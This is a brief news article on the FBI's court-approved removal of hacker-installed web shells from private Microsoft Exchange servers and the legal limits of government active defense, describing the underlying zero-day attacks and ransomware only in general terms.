Cybersecurity – What are the Boundaries of Active Defense? 

Cybersecurity – What are the Boundaries of Active Defense? 

photo illus. cybersecurity by Pixabay

This post is also available in: heעברית (Hebrew)

The US has been practicing active defense against hackers. As part of a government effort to contain the continuing attacks on corporate networks running Microsoft Exchange software, the FBI has now the authority to access privately-owned computers without their owners’ knowledge or consent, and to delete software. This unprecedented intrusion is raising legal questions about just how far the government can go.

The software the FBI is deleting is malicious code installed by hackers to take control of a victim’s computer. Hackers have used the code to access vast amounts of private email messages and to launch ransomware attacks. 

On April 9, the United States District Court for the Southern District of Texas approved a search warrant allowing the U.S. Department of Justice to carry out the operation.

The authority the Justice Department relied on and the way the FBI carried out the operation set important precedents. They also raise questions about the power of courts to regulate cybersecurity without the consent of the owners of the targeted computers, according to homelandsecuritynewswire.com.

Public-private cooperation is critical for managing the wide range of cyber threats facing the U.S. But it poses challenges, including determining how far the government can go in the name of national security. It’s also important for Congress and the courts to oversee this balancing act.

Since at least January 2021, hacking groups have been using zero-day exploits – meaning previously unknown vulnerabilities – in Microsoft Exchange to access email accounts. The hackers used this access to insert web shells, software that allows them to remotely control the compromised systems and networks. Tens of thousands of email users and organizations have been affected. One result has been a series of ransomware attacks, which encrypt victims’ files and hold the keys to decrypt them for ransom.